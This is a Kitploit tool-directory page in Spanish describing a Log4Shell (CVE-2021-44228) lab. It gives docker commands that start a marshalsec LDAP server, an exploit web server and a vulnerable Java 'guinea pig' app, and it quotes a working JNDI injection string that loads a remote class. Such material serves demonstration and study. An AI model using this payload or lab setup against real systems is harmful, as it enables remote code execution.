Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228_Example | Kitploit
Herramientas/GitHubGitHub/chilliwebs/cve-2021-44228_example
Análisis Dinámico (Sandboxing)Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones Web
GitHubchilliwebs/cve-2021-44228_example

CVE-2021-44228_Example

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228_Example

Ejecuta cada una de las 3 secciones en una pestaña/consola separada

Servidor LDAP marshalsec https://github.com/chilliwebs/marshalsec (Bifurcado de https://github.com/mbechler/marshalsec)

root@kitploit:~
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec

El servidor web del exploit

root@kitploit:~
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit

La aplicación Java conejillo de indias (ejecutando versiones vulnerables de Java y Log4J)

root@kitploit:~
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig

Al ejecutar guinea_pig deberías ver lo siguiente en el registro:

root@kitploit:~
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}

"PWND!" se registra desde una clase inyectada externamente (Exploit)

Descargar herramienta